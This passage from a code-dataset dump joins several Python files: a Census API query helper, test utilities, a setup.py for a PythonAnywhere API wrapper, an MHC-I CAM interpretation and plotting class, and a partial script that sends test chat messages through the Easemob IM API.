        # BUG FIX: always assign the attribute; it was previously only set
        # when a year was given, making `query` crash with AttributeError.
        self._year = year
        self._api_key = api_key
        assert out in ["pd", "ds"], """out argument must be \"pd\" or \"ds\""""
        self._out = out

    def _make_params(self, variables, state, county, tract, year):
        """
        Creates parameters dict for requests
        Args:
        * `variables` (`list`): List of variables to extract
        * `state` (`str`): Abbreviation for state from which to query data
        * `county` (`str`): County name for localized queries
        * `tract` (`str`): FIPS code for tract to query data from
        * `year` (`int`): Year for which to query data
        Returns:
        * `dict`. A dict of parameters for the API query
        """
        assert isinstance(variables, list), "variables must be a list"
        assert len(state) == 2, "state must be an abbreviation"
        params = {}
        params["get"] = ",".join(variables)
        params["for"] = "tract:{}".format(tract)
        state_fips = zero_pad_state(state)
        params["in"] = "state:{}".format(state_fips)
        if county:
            county_fips = get_county_fips(county, state)
            params["in"] += "+county:{}".format(county_fips)
        params["key"] = self._api_key
        return params

    def _send_request(self, variables, state, county, tract, year):
        """
        Sends request to API through `requests` package
        Args:
        * `variables` (`list`): List of variables to extract
        * `state` (`str`): Abbreviation for state from which to query data
        * `county` (`str`): County name for localized queries
        * `tract` (`str`): FIPS code for tract to query data from
        * `year` (`int`): Year for which to query data
        Returns:
        * `pandas.DataFrame`. The data retrieved from the query, or the
          raw response text when it is not JSON (API error messages).
        """
        params = self._make_params(variables, state, county, tract, year)
        url = "https://api.census.gov/data/{}/{}".format(year, self._dataset)
        response = requests.get(url, params)
        try:
            text = json.loads(response.text)
        except json.JSONDecodeError:
            # API errors come back as plain text; hand them to the caller.
            return response.text
        cols = text[0]
        return pd.DataFrame(text[1:], columns=cols)

    def query(self, variables, state, county=None, tract="*", year=None):
        """
        Queries Census API to get data regarding listed variables; if `year` provided, ignores `CensusQuery` instance year
        Args:
        * `variables` (`list`): List of variables to extract
        * `state` (`str`): Abbreviation for state from which to query data
        * `county` (`str`): County name for localized queries
        * `tract` (`str`): FIPS code for tract to query data from
        * `year` (`int`): Year for which to query data; if provided, ignores instance `year`
        Returns:
        * `pandas.DataFrame` or `datascience.tables.Table`. The data retrieved from the query
        """
        if year is None:
            # BUG FIX: fall back to the instance-level year as documented;
            # the original passed None to the API when `year` was omitted.
            year = self._year
        assert year is not None, "Year must be defined"
        assert isinstance(year, int), "{} not a valid year".format(year)
        response_df = self._send_request(variables, state, county, tract, year)
        # BUG FIX: `response_df == ""` on a DataFrame raised ValueError;
        # only string (error-text) responses are passed straight through.
        if isinstance(response_df, str):
            return response_df
        if self._out == "ds":
            return ds.Table.from_df(response_df)
return response_df | 29.719424 | 115 | 0.657952 | 3,921 | 0.949165 | 0 | 0 | 0 | 0 | 0 | 0 | 2,426 | 0.587267 |
33f9bc9ef4a0562402b71b8f52d5b6955d65ca99 | 264 | py | Python | tests/utils.py | mihhail-m/avaandmed-py | c64b07db989b9aff4cfa7f4e18efc0c47ae5e219 | [
"MIT"
] | null | null | null | tests/utils.py | mihhail-m/avaandmed-py | c64b07db989b9aff4cfa7f4e18efc0c47ae5e219 | [
"MIT"
] | 5 | 2022-03-17T15:00:23.000Z | 2022-03-26T08:33:19.000Z | tests/utils.py | mihhail-m/avaandmed-py | c64b07db989b9aff4cfa7f4e18efc0c47ae5e219 | [
"MIT"
] | null | null | null | import json
from pathlib import Path
def load_json(path: Path):
    """Read and deserialize a JSON document from the given path."""
    with path.absolute().open(encoding='utf-8') as handle:
        return json.load(handle)
def format_mock_url(url: str, mock_value: str):
    """Join *url* and *mock_value* with a single slash separator."""
    return '{}/{}'.format(url, mock_value)
| 18.857143 | 54 | 0.659091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 28 | 0.106061 |
33faf3e59ae2a6c2f4688c40e56760f5e45ff478 | 999 | py | Python | setup.py | ammarsys/pyanywhere-wrapper | d8cde2d29900c25fc7ab3cd8103923f727b5dade | [
"MIT"
] | 5 | 2021-06-25T14:34:52.000Z | 2021-07-04T14:15:13.000Z | setup.py | ammarsys/pyanywhere-wrapper | d8cde2d29900c25fc7ab3cd8103923f727b5dade | [
"MIT"
] | 1 | 2021-12-12T00:47:25.000Z | 2022-01-24T17:19:43.000Z | setup.py | ammarsys/pyanywhere-wrapper | d8cde2d29900c25fc7ab3cd8103923f727b5dade | [
"MIT"
] | 1 | 2021-12-14T15:44:52.000Z | 2021-12-14T15:44:52.000Z | import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="pyaww",
version="0.0.3",
author="ammarsys",
author_email="amarftw1@gmail.com",
description="A simple API wrapper around the pythonanywhere's API.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ammarsys/pyaww/",
project_urls={
"Bug Tracker": "https://github.com/ammarsys/pyaww/issues",
},
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
"Operating System :: OS Independent",
],
packages=['pyaww'],
install_requires=[
'typing_extensions==3.10.0.0', 'requests==2.25.1'
],
python_requires=">=3.6",
license='MIT'
) | 31.21875 | 72 | 0.627628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 519 | 0.51952 |
33fd5340f85ed0ca31c259e1144a71ef4b91e995 | 24,831 | py | Python | development/CAMInterp.py | kohanlee1995/MHCfovea | 040975e43926a5f8e344b642af6e900b74b50d02 | [
"MIT"
] | 4 | 2021-04-29T02:57:15.000Z | 2022-01-10T10:31:52.000Z | development/CAMInterp.py | kohanlee1995/MHCfovea | 040975e43926a5f8e344b642af6e900b74b50d02 | [
"MIT"
] | null | null | null | development/CAMInterp.py | kohanlee1995/MHCfovea | 040975e43926a5f8e344b642af6e900b74b50d02 | [
"MIT"
] | 1 | 2021-04-21T07:38:55.000Z | 2021-04-21T07:38:55.000Z | import os, sys, re, json, random, importlib
import numpy as np
import pandas as pd
from collections import OrderedDict
from tqdm import tqdm
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import logomaker as lm
from venn import venn
from venn import generate_petal_labels, draw_venn
from scipy.stats import pearsonr
from scipy.cluster import hierarchy
from util import *
import warnings
warnings.filterwarnings('ignore')
class CAMInterp():
def __init__(self, mhc_seq_filename, allele_mask_dirname, epitope_mask_dirname, df_filename, output_dir,
pred_basename='score', pred_threshold=0.9, mhc_len=182, min_sample_num=100, submotif_len=4):
self.aa_str = 'ACDEFGHIKLMNPQRSTVWY'
self.mhc_len = mhc_len
self.epitope_len = 10
self.res34_pos = [6, 8, 23, 44, 58, 61, 62, 65, 66, 68, 69, 72, 73, 75, 76, 79, 80, 83, 94,
96, 98, 113, 115, 117, 142, 146, 149, 151, 155, 157, 158, 162, 166, 170]
self.color_dict = {'A': '#DACC47', 'B': '#B1DEC9', 'C': '#FFBB99', 'polymorphism': '#875A85'}
self.dpi = 600
self.fontsize = 10
self.pred_basename = pred_basename
self.pred_threshold = pred_threshold
self.min_sample_num = min_sample_num
self.submotif_len = submotif_len
self.output_dir = output_dir
# mhc_seq_dict
self.mhc_seq_dict = json.load(open(mhc_seq_filename, 'r'))
# allele_mask_df
if type(allele_mask_dirname) == list:
alleles = [self._convert_allele(i) for i in os.listdir(allele_mask_dirname[0])]
self.allele_mask_df = pd.DataFrame(columns=alleles, index=range(self.mhc_len), data=0)
self.allele_mask_df.loc['count'] = 0
for i in range(len(allele_mask_dirname)):
temp_df = pd.DataFrame(self._parse_mask(allele_mask_dirname[i], mask_type='mhc'))
self.allele_mask_df.loc[temp_df.index, temp_df.columns] += temp_df
self.allele_mask_df.loc['count', temp_df.columns] += 1
self.allele_mask_df = self.allele_mask_df.loc[:, self.allele_mask_df.loc['count'] != 0]
self.allele_mask_df.loc[range(self.mhc_len)] /= self.allele_mask_df.loc['count']
self.allele_mask_df = self.allele_mask_df.drop('count')
else:
self.allele_mask_df = pd.DataFrame(self._parse_mask(allele_mask_dirname, mask_type='mhc'))
self.allele_mask_df.to_csv('%s/AlleleMask.csv'%self.output_dir)
# epitope_mask_df
if type(epitope_mask_dirname) == list:
alleles = [self._convert_allele(i) for i in os.listdir(epitope_mask_dirname[0])]
self.epitope_mask_df = pd.DataFrame(columns=alleles, index=range(self.epitope_len), data=0)
self.epitope_mask_df.loc['count'] = 0
for i in range(len(epitope_mask_dirname)):
temp_df = pd.DataFrame(self._parse_mask(epitope_mask_dirname[i], mask_type='epitope'))
self.epitope_mask_df.loc[temp_df.index, temp_df.columns] += temp_df
self.epitope_mask_df.loc['count', temp_df.columns] += 1
self.epitope_mask_df = self.epitope_mask_df.loc[:, self.epitope_mask_df.loc['count'] != 0]
self.epitope_mask_df.loc[range(self.epitope_len)] /= self.epitope_mask_df.loc['count']
self.epitope_mask_df = self.epitope_mask_df.drop('count')
else:
self.epitope_mask_df = pd.DataFrame(self._parse_mask(epitope_mask_dirname, mask_type='epitope'))
self.epitope_mask_df['position'] = [1,2,3,4,5,-5,-4,-3,-2,-1]
self.epitope_mask_df = self.epitope_mask_df.set_index('position', drop=True)
self.epitope_mask_df.to_csv('%s/EpitopeMask.csv'%self.output_dir)
# df
self.df = pd.read_csv(df_filename, index_col=0)
self.alleles = list(self.df['mhc'].unique())
self.allele_num = len(self.alleles)
# motif_dict
self.motif_dict = self._parse_motif(pred_basename, pred_threshold, self.min_sample_num)
self.alleles = list(self.df['mhc'].unique())
self.allele_num = len(self.alleles)
# mhc_seqlogo_df
self.mhc_seqlogo_df = self._mhc_seqlogo_df(self.alleles, list(range(self.mhc_len)))
def ResidueAnalysis(self, cam_threshold, importance_threshold, barplot_figsize=(10,2), square_figsize=(3.5,3.5)):
# mean plot
self._residue_barplot(self.allele_mask_df.mean(axis=1), self.res34_pos, figsize=barplot_figsize,
figfile='%s/CAMmean.png'%self.output_dir)
# importance plot
importance_count = self._residue_importance_count(self.alleles, cam_threshold)
self._residue_barplot(importance_count, self.res34_pos, figsize=barplot_figsize,
figfile='%s/CAMimportance.png'%self.output_dir)
# important residues - stacked plot
df = self._importance_stacked_barplot(cam_threshold, self.res34_pos,
xticklabels=False, yticklabels=True, figsize=barplot_figsize,
figfile='%s/CAMimportanceStacked.png'%self.output_dir)
df.to_csv('%s/ImportanceStack.csv'%self.output_dir)
# important residues
residue_dict = self._select_residue(cam_threshold, importance_threshold)
json.dump(residue_dict, open('%s/ResidueSelection.json'%self.output_dir, 'w'))
# venn diagram of residue selection
self._importance_venn_plot(residue_dict, figsize=square_figsize,
figfile='%s/ResidueSelectionVenn.png'%self.output_dir)
# correlation between residue importance and sequence entropy
# entropy = sigma(probability**2)
# allele part
df = self._mhc_importance_polymorphism_plot(cam_threshold, residue_dict, figsize=square_figsize,
figfile='%s/AlleleImportanceEntropyCorrelation.png'%self.output_dir)
df.to_csv('%s/AlleleImportancePolymorphism.csv'%self.output_dir)
# epitope part
df = self._epitope_importance_polymorphism_plot(figsize=square_figsize,
figfile='%s/EpitopeImportanceEntropyCorrelation.png'%self.output_dir)
df.to_csv('%s/EpitopeImportancePolymorphism.csv'%self.output_dir)
def ClusterAnalysis(self, method, metric, allele_figsize=(10,2), epitope_figsize=(3.5,3.5)):
alleles = self.alleles
# allele masks
allele_order, position_order = self._mask_clustering_plot(alleles, mask_type='mhc',
method=method, metric=metric,
xticklabels=False, yticklabels=False,
row_colors=True, figsize=allele_figsize,
title=None, xlabel='MHC-I position', ylabel='MHC-I allele',
figfile='%s/AlleleCAMcluster_all.png'%self.output_dir)
# epitope masks
allele_order, position_order = self._mask_clustering_plot(alleles, mask_type='epitope',
method=method, metric=metric,
xticklabels=True, yticklabels=False,
row_colors=True, figsize=epitope_figsize,
title=None, xlabel='peptide position', ylabel='MHC-I allele',
figfile='%s/EpitopeCAMcluster_all.png'%self.output_dir)
""""""""""""""""""""""""""""""""""""""
# Plots
""""""""""""""""""""""""""""""""""""""
# mask_type: mhc or epitope
def _mask_clustering_plot(self, alleles, mask_type='mhc',
method='average', metric='euclidean',
allele_linkage=True, position_linkage=False,
row_colors=False, xticklabels=True, yticklabels=True,
title=None, xlabel=None, ylabel=None,
figsize=(8, 4), figfile=None):
# residue positions
if mask_type == 'mhc':
positions = list(range(self.mhc_len))
df = self.allele_mask_df.iloc[positions][alleles].T
else:
positions = [1,2,3,4,-4,-3,-2,-1]
df = self.epitope_mask_df.loc[positions][alleles].T
# linkage
zx, zy = None, None
if allele_linkage:
zy = hierarchy.linkage(df, method=method, metric=metric, optimal_ordering=True)
if position_linkage:
zx = hierarchy.linkage(df.T, method=method, metric=metric, optimal_ordering=True)
# row colors
if row_colors:
color_list = list()
for allele in alleles:
hla = allele.split('*')[0]
color_list.append(self.color_dict[hla])
else:
color_list = None
# clustermap
g = sns.clustermap(df,
col_cluster=position_linkage,
row_cluster=allele_linkage,
row_linkage=zy,
col_linkage=zx,
row_colors = color_list,
cmap='Blues',
cbar_kws={'orientation': 'horizontal', 'label': 'mask score'},
cbar_pos=(.3, -.05, .4, .02),
dendrogram_ratio=0.1,
colors_ratio=0.02,
xticklabels=xticklabels,
yticklabels=yticklabels,
figsize=figsize)
g.ax_heatmap.set_title(title)
g.ax_heatmap.set_xlabel(xlabel)
g.ax_heatmap.set_ylabel(ylabel)
# cluster order
if allele_linkage:
allele_order = g.dendrogram_row.reordered_ind
allele_order = [alleles[i] for i in allele_order]
else:
allele_order = None
if position_linkage:
position_order = g.dendrogram_col.reordered_ind
position_order = [positions[i] for i in position_order]
else:
position_order = None
# save figure
if figfile:
plt.savefig(figfile, bbox_inches='tight', dpi=self.dpi)
return allele_order, position_order
def _motif_plot(self, alleles, motif_dict, figfile=None):
allele_num = len(alleles)
fig, ax = plt.subplots(allele_num, figsize=(0.8, allele_num*0.2), dpi=self.dpi)
for i in range(allele_num):
allele = alleles[i]
seqlogo_df = pd.DataFrame(motif_dict[allele], columns=list(self.aa_str))
logo = lm.Logo(seqlogo_df, ax=ax[i], color_scheme="skylign_protein")
_ = ax[i].set_xticks([])
_ = ax[i].set_yticks([])
for side in ['top','bottom','left','right']:
ax[i].spines[side].set_linewidth(0.1)
fig.tight_layout()
if figfile:
fig.savefig(figfile)
def _residue_barplot(self, arr, tag_pos, figsize=(8,3), figfile=None):
# main figure
fig, ax = plt.subplots(1, figsize=figsize, dpi=self.dpi)
sns.barplot(x=list(range(self.mhc_len)), y=arr, ax=ax)
ax.tick_params(axis='x', rotation=90)
# fontsize
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] + ax.get_yticklabels()):
item.set_fontsize(self.fontsize)
for item in ax.get_xticklabels():
item.set_fontsize(self.fontsize/4)
# set xtick colors
colors = list()
for i in range(self.mhc_len):
if i in tag_pos:
colors.append('red')
else:
colors.append('black')
for tick, color in zip(ax.get_xticklabels(), colors):
tick.set_color(color)
fig.tight_layout()
# save figure
if figfile:
fig.savefig(figfile, bbox_inches='tight')
def _importance_stacked_barplot(self, cam_threshold, tag_pos, figsize=(8,3),
xticklabels=True, yticklabels=True, figfile=None):
# build importance dataframe, columns=['A','B','C']
d = dict()
for hla in ['A', 'B', 'C']:
alleles = [i for i in self.alleles if hla in i]
d[hla] = self._residue_importance_count(alleles, cam_threshold)
df = pd.DataFrame(d)
# figure
fig = plt.figure(figsize=figsize, dpi=self.dpi)
ax = fig.add_subplot(111)
ax.margins(x=0)
# stacked bar plot
ax.bar(df.index, df['A'], color=self.color_dict['A'])
ax.bar(df.index, df['B'], bottom=df['A'], color=self.color_dict['B'])
ax.bar(df.index, df['C'], bottom=df['A'] + df['B'], color=self.color_dict['C'])
# ticks & ticklabels
if xticklabels:
_ = ax.set_xticks(df.index)
_ = ax.set_xticklabels(df.index+1, rotation=90)
# xtick colors
colors = list()
for i in df.index:
if i in tag_pos:
colors.append('red')
else:
colors.append('black')
for tick, color in zip(ax.get_xticklabels(), colors):
tick.set_color(color)
else:
_ = ax.set_xticks([])
_ = ax.set_xticklabels([])
if yticklabels:
_ = ax.set_ylabel('importance')
else:
_ = ax.set_yticks([])
_ = ax.set_yticklabels([])
# fontsize
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] + ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(self.fontsize)
# legend
Abar = matplotlib.patches.Rectangle((0,0),1,1,fc=self.color_dict['A'], edgecolor='none')
Bbar = matplotlib.patches.Rectangle((0,0),1,1,fc=self.color_dict['B'], edgecolor='none')
Cbar = matplotlib.patches.Rectangle((0,0),1,1,fc=self.color_dict['C'], edgecolor='none')
l = ax.legend([Abar, Bbar, Cbar], ['HLA-A', 'HLA-B', 'HLA-C'], loc=0, ncol=3, fontsize=self.fontsize)
l.draw_frame(False)
fig.tight_layout()
# save figure
if figfile:
fig.savefig(figfile, bbox_inches='tight')
return df
def _mhc_importance_polymorphism_plot(self, cam_threshold, position_dict, figsize=(3.5,3.5), s=2, figfile=None):
# figure
df = pd.DataFrame()
fig, ax = plt.subplots(1, figsize=figsize, dpi=self.dpi)
# calculate entropy
df['polymorphism'] = -(self.mhc_seqlogo_df*np.log(self.mhc_seqlogo_df)).sum(axis=1)
# calculate importance by HLA
importance_counts = list()
for hla in ['A', 'B', 'C']:
alleles = [i for i in self.alleles if hla in i]
importance_counts.append(self._residue_importance_count(alleles, cam_threshold))
importance_counts = np.array(importance_counts)
importance_count = importance_counts.max(axis=0)
df['importance'] = importance_count
# label
df['label'] = 'others'
df.loc[position_dict['res34'], 'label'] = '34-residue'
df.loc[position_dict['selected'], 'label'] = 'selected'
intersect = list(set(position_dict['res34']) & set(position_dict['selected']))
df.loc[intersect, 'label'] = 'intersection'
# plot_param
param_dict = OrderedDict({'selected':{'color': '#ff4949', 'marker': 'o', 's': 12},
'intersection': {'color': '#ff4949', 'marker': 'x', 's': 12},
'34-residue': {'color': '#adb5bd', 'marker': 'x', 's': 12},
'others': {'color': '#adb5bd', 'marker': 'o', 's': 12}})
# regplot
df = df[df['polymorphism']!=0]
p = sns.regplot(x='importance', y='polymorphism', data=df, ax=ax, fit_reg=True, scatter_kws={'s':0})
for label, params in param_dict.items():
p = sns.regplot(x='importance', y='polymorphism', data=df[df['label']==label],
ax=ax, fit_reg=False, marker=params['marker'],
scatter_kws={'color':params['color'], 's':params['s'], 'linewidths': 0.1})
'''
# annotation
for idx, row in df.iterrows():
if idx in [64, 70]:
p.text(df.loc[idx, 'importance']-0.025, df.loc[idx, 'polymorphism']-0.09, idx+1, fontsize=self.fontsize-2)
'''
# fontsize
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] + ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(self.fontsize)
# legend
legend_list = [matplotlib.patches.Rectangle((0,0),1,1,fc='#ff4949', edgecolor='none'),
matplotlib.patches.Rectangle((0,0),1,1,fc='#adb5bd', edgecolor='none'),
plt.scatter([], [], color='black', marker='x', s=12),
plt.scatter([], [], color='black', marker='o', s=12)]
label_list = ['selected', 'non-selected', '34-residue', 'non-34-residue']
l = ax.legend(handles=legend_list, labels=label_list,
loc='lower left', bbox_to_anchor=(-0.2,1), ncol=2, fontsize=self.fontsize)
l.draw_frame(True)
# layout
ax.set_xticks([0.0, 0.2, 0.4, 0.6, 0.8, 1.0, 1.02])
ax.set_xticklabels([0.0, 0.2, 0.4, 0.6, 0.8, 1.0, ''])
fig.tight_layout()
# pearson correlation
pearson, pvalue = pearsonr(df['importance'], df['polymorphism'])
ax.text(0.05, 1.6, 'r=%.2f, p=%.2e'%(pearson, pvalue))
# save figure
if figfile:
fig.savefig(figfile, bbox_inches='tight')
return df
def _epitope_importance_polymorphism_plot(self, figsize=(3.5,3.5), figfile=None):
# get epitope polymorphism
peptides = self.df[self.df[self.pred_basename] > self.pred_threshold]['sequence'].to_list()
peptides = [i[:self.submotif_len] + i[-self.submotif_len:] for i in peptides]
seqlogo_df = lm.alignment_to_matrix(sequences=peptides, to_type="probability",
characters_to_ignore=".", pseudocount=0)
polymorphism = -(seqlogo_df*np.log(seqlogo_df)).sum(axis=1).to_numpy()
# df for plot
df = pd.DataFrame(index=list(range(1, 1+self.submotif_len)) + list(range(-self.submotif_len, 0)))
df['polymorphism'] = polymorphism
df['mask_score'] = self.epitope_mask_df.mean(axis=1)[df.index]
df['residue_tag'] = 'other'
df.loc[[2,-1], 'residue_tag'] = 'anchor'
# plot
fig, ax = plt.subplots(1, 1, figsize=figsize, dpi=self.dpi)
sns.scatterplot(data=df, x='mask_score', y='polymorphism', hue='residue_tag', ax=ax)
for pos in [2, -1]:
ax.text(x=df.loc[pos, 'mask_score']-0.25, y=df.loc[pos, 'polymorphism'], s='Position: {}'.format(pos))
fig.tight_layout()
if figfile:
fig.savefig(figfile, bbox_inches='tight')
return df
def _importance_venn_plot(self, position_dict, figsize=(3.5,3.5), figfile=None):
keys = ['A','B','C','polymorphism']
position_dict = {k: set(v) for k, v in position_dict.items() if k in keys}
petal_labels = generate_petal_labels(position_dict.values())
colors = [list(np.array(self._convert_color_code(self.color_dict[k]))/256) + [0.4] for k in keys]
fig, ax = plt.subplots(1, figsize=figsize, dpi=self.dpi)
draw_venn(petal_labels=petal_labels, dataset_labels=position_dict.keys(),hint_hidden=False,
colors=colors, figsize=figsize, fontsize=self.fontsize, legend_loc="best", ax=ax)
ax.get_legend().remove()
legends = [matplotlib.patches.Rectangle((0,0),1,1,fc=color, edgecolor='none') for color in colors]
l = fig.legend(legends, keys, fontsize=self.fontsize,
ncol=4, loc="lower center", bbox_to_anchor=(0, 0.75, 1, 0.2),
columnspacing=1, handlelength=0.5, handletextpad=0.2, borderpad=0.2)
fig.tight_layout()
if figfile:
fig.savefig(figfile, bbox_inches='tight')
""""""""""""""""""""""""""""""""""""""
# Minor Functions
""""""""""""""""""""""""""""""""""""""
def _parse_mask(self, dirname, mask_type):
masks = OrderedDict()
for allele in os.listdir(dirname):
if re.match(r'[ABC][0-9]+', allele):
if not os.path.isfile('%s/%s/record.npy'%(dirname, allele)):
continue
if mask_type == 'mhc':
masks[self._convert_allele(allele)] \
= np.load('%s/%s/record.npy'%(dirname, allele), allow_pickle=True)[()]['mhc_masks'].mean(axis=0)
else:
masks[self._convert_allele(allele)] \
= np.load('%s/%s/record.npy'%(dirname, allele), allow_pickle=True)[()]['epitope_masks'].mean(axis=0)
return masks
def _parse_motif(self, basename, threshold, sample_num):
motifs = OrderedDict()
for i in range(self.allele_num):
allele = self.alleles[i]
seqs = self.df.loc[(self.df['mhc']==allele) & (self.df[basename] >= threshold), 'sequence']
if len(seqs) >= sample_num:
seqs = seqs.apply(lambda x: x[:self.submotif_len] + x[-self.submotif_len:])
temp_df = pd.DataFrame(columns=list(self.aa_str))
seqlogo_df = lm.alignment_to_matrix(sequences=seqs, to_type="information", characters_to_ignore="XU")
temp_df = pd.concat([temp_df, seqlogo_df], axis=0)
temp_df = temp_df.fillna(0.0)
motifs[allele] = temp_df.to_numpy()
return motifs
def _residue_importance_count(self, alleles, cam_threshold):
importance_count = np.array([0]*self.mhc_len)
for allele in alleles:
importance_count[self.allele_mask_df[allele] > cam_threshold] += 1
return importance_count / len(alleles)
def _mhc_seqlogo_df(self, alleles, positions):
seqs = list()
for allele in alleles:
seqs.append(''.join(self.mhc_seq_dict[allele][j] for j in positions))
temp_df = pd.DataFrame(columns=list(self.aa_str))
seqlogo_df = lm.alignment_to_matrix(sequences=seqs, to_type="probability",
characters_to_ignore=".", pseudocount=0)
temp_df = pd.concat([temp_df, seqlogo_df], axis=0)
temp_df = temp_df.fillna(0.0)
return temp_df
def _select_residue(self, cam_threshold, importance_threshold):
importance_positions = dict()
importance_position_set = set()
importance_positions['res34'] = self.res34_pos
# by HLA
for hla in ['A', 'B', 'C']:
alleles = [i for i in self.alleles if hla in i]
importance_count = self._residue_importance_count(alleles, cam_threshold)
pos = list(map(int, np.where(importance_count > importance_threshold)[0]))
importance_positions[hla] = pos
importance_position_set = importance_position_set | set(pos)
# polymorphism
polymorphism_position = list(map(int,self.mhc_seqlogo_df[~(self.mhc_seqlogo_df.max(axis=1)==1)].index))
importance_positions['polymorphism'] = sorted(polymorphism_position)
importance_position_set = importance_position_set & set(polymorphism_position)
# final
importance_position = sorted(list(importance_position_set))
importance_positions['selected'] = importance_position
return importance_positions
def _convert_allele(self, allele):
if re.match(r'[ABC][0-9]+', allele):
return allele[0] + '*' + allele[1:-2] + ':' + allele[-2:]
elif re.match(r'[ABC]\*[0-9]+\:[0-9]+', allele):
return allele
def _convert_color_code(self, code):
return tuple(int(code[i:i+2], 16) for i in (1, 3, 5))
| 45.813653 | 127 | 0.568966 | 24,382 | 0.981918 | 0 | 0 | 0 | 0 | 0 | 0 | 3,311 | 0.133341 |
33feaaef9c20723000c009c977b27fc9c05c9b4d | 4,478 | py | Python | projects/imsend/imsend.py | ZJM6658/PythonProject | 8ca51a1551b20ccd696358941727188838e0e236 | [
"MIT"
] | 1 | 2021-06-09T02:06:17.000Z | 2021-06-09T02:06:17.000Z | projects/imsend/imsend.py | ZJM6658/PythonProject | 8ca51a1551b20ccd696358941727188838e0e236 | [
"MIT"
] | null | null | null | projects/imsend/imsend.py | ZJM6658/PythonProject | 8ca51a1551b20ccd696358941727188838e0e236 | [
"MIT"
] | null | null | null | #!usr/bin/python
# -*- coding: utf-8 -*-
' an im_send project '
# __author__ 'ZHU JIAMIN'
import sys
import mysql.connector #python3不支持
import requests
import json
from os import path, access, R_OK # W_OK for write permission.
# Python 2 defaults to the ascii codec; switch the default encoding to utf8.
reload(sys)
sys.setdefaultencoding('utf8')
# Workflow:
# 1. Validate the command-line arguments (mobile is required, the rest have defaults).
# 2. Look for an accessToken file next to this script; read the token from it if
#    present, otherwise fetch one from the Easemob (Huanxin) server and write it there.
# 3. With the access token, query the database using the input parameters
#    (mobile, limit, offset) for the sender set and the receiver's user info.
# 4. Send the messages in a loop.
# Base URL for API requests
BASE_URL = 'https://a1.easemob.com/xxxx/xxxxxx'
# Credentials used to obtain and store the Easemob ACCESS_TOKEN
CLIENT_ID = 'xxxxxx'
CLIENT_SECRET = 'xxxxxxx'
ACCESS_TOKEN ='' # loaded from the token file
TOKEN_PATH = './accessToken.txt'
# Holds the parsed command-line parameters
INPUT_PARAMS = {'offset':0, 'limit':1, 'isGroup':0, 'text': '测试消息'}
# TODO
# Support sending a message to every group a user has joined
# Support everyone in a group sending messages to that group at the same time
def main():
    """Parse '-key value' command-line pairs into INPUT_PARAMS, validate
    them, then kick off the token check / send pipeline."""
    args = sys.argv
    if len(args) == 1:
        print('请输入必要参数:\
        \n-mobile 接收方手机号(必填)\
        \n-text 发送内容(默认为:测试消息)\
        \n-offset 起始游标(默认为0)\
        \n-limit 发送数量(默认为1)')
        # \n-isGroup 是否群聊(默认为0,需要则填1)'
        return
    global INPUT_PARAMS
    argsLen = len(args)
    for i in range(argsLen):
        arg = args[i]
        # Skip the first argument (the script path itself)
        if i == 0: continue
        if i%2 == 1:
            # Strip the leading '-' from the key argument
            arg = arg.replace('-', '')
            if i < argsLen - 1:
                INPUT_PARAMS[arg] = args[i+1]
        pass
    # Make sure the required 'mobile' parameter was supplied
    if not('mobile' in INPUT_PARAMS) or len(INPUT_PARAMS['mobile']) == 0:
        print('请传入必要参数-mobile')
        return
    # print INPUT_PARAMS
    limit = int(INPUT_PARAMS['limit'])
    offset = int(INPUT_PARAMS['offset'])
    # Range check: both values must stay within [0, 2000) combined.
    if limit < 0 or offset < 0 or limit > 2000 or offset > 2000 or (offset + limit) > 2000:
        print('limit 和 offset参数必须>=0, <2000, 且limit + offset < 2000')
        return
    checkAccessToken()
    pass
# Check for a cached access token; fetch a new one if it is missing.
def checkAccessToken():
    """Load ACCESS_TOKEN from TOKEN_PATH if readable, otherwise fetch a
    fresh token, then continue with prepareSend()."""
    global ACCESS_TOKEN
    if path.exists(TOKEN_PATH) and path.isfile(TOKEN_PATH) and access(TOKEN_PATH, R_OK):
        # print("token file exists and is readable")
        f = open(TOKEN_PATH, 'r')
        ACCESS_TOKEN = f.read()
        f.close()
        # Empty file -> still need to fetch a token.
        if not(ACCESS_TOKEN):
            getIMAccessToken()
    else:
        # print("token file missing or unreadable")
        getIMAccessToken()
    prepareSend()
    pass
# Prepare to send: gather the receiver info and the sender list from the DB.
def prepareSend():
    """Look up the receiver by mobile number and a batch of test senders,
    then send one message from each sender to the receiver."""
    userSQL = 'select * from y_user where mobile_phone=%s && isdel=0' %(INPUT_PARAMS['mobile'], )
    result = getDataFromDataBase(userSQL)
    if len(result) == 0 :
        print "未查询到手机号码为%s的用户,请检查手机号是否正确" %(INPUT_PARAMS['mobile'])
        return
    accepterInfo = result[0]
    sendersSQL = 'select * from y_user where mobile_phone like "1300000%%" && isdel=0 limit %s offset %s' %(INPUT_PARAMS['limit'], INPUT_PARAMS['offset'])
    result = getDataFromDataBase(sendersSQL)
    if len(result) == 0:
        print '没有找到发送者列表'
        return
    # The imid field is at index 14; with no ORM each row comes back as a tuple.
    toImId = accepterInfo[14]
    for user in result:
        sendMessage(user, toImId)
        pass
    pass
# Send one text message from fromUser to the receiver's IM id.
def sendMessage(fromUser, toImId):
    """POST a single text message to the Easemob /messages endpoint and
    log success/failure per sender. No-op when ACCESS_TOKEN is empty."""
    fromImId = fromUser[14]
    if len(ACCESS_TOKEN) == 0: return
    sendBody = {
        "target_type": "users",
        "target": [
            toImId
        ],
        "msg": {
            "type": "txt",
            "msg": INPUT_PARAMS['text']
        },
        "from": fromImId,
        "ext": {
            "attr1": "v1"
        }
    }
    url = BASE_URL + '/messages'
    headers = {
        'Content-Type': 'application/json;charset=utf-8',
        'Authorization': ACCESS_TOKEN
    }
    r = requests.post(url, headers = headers, data = json.dumps(sendBody))
    # print fromUser
    # Indices 7/8 are presumably the user name and phone columns — TODO confirm against schema.
    logInfo = '用户名:%s,手机号:%s,' %(fromUser[7], fromUser[8])
    if r.status_code == 200:
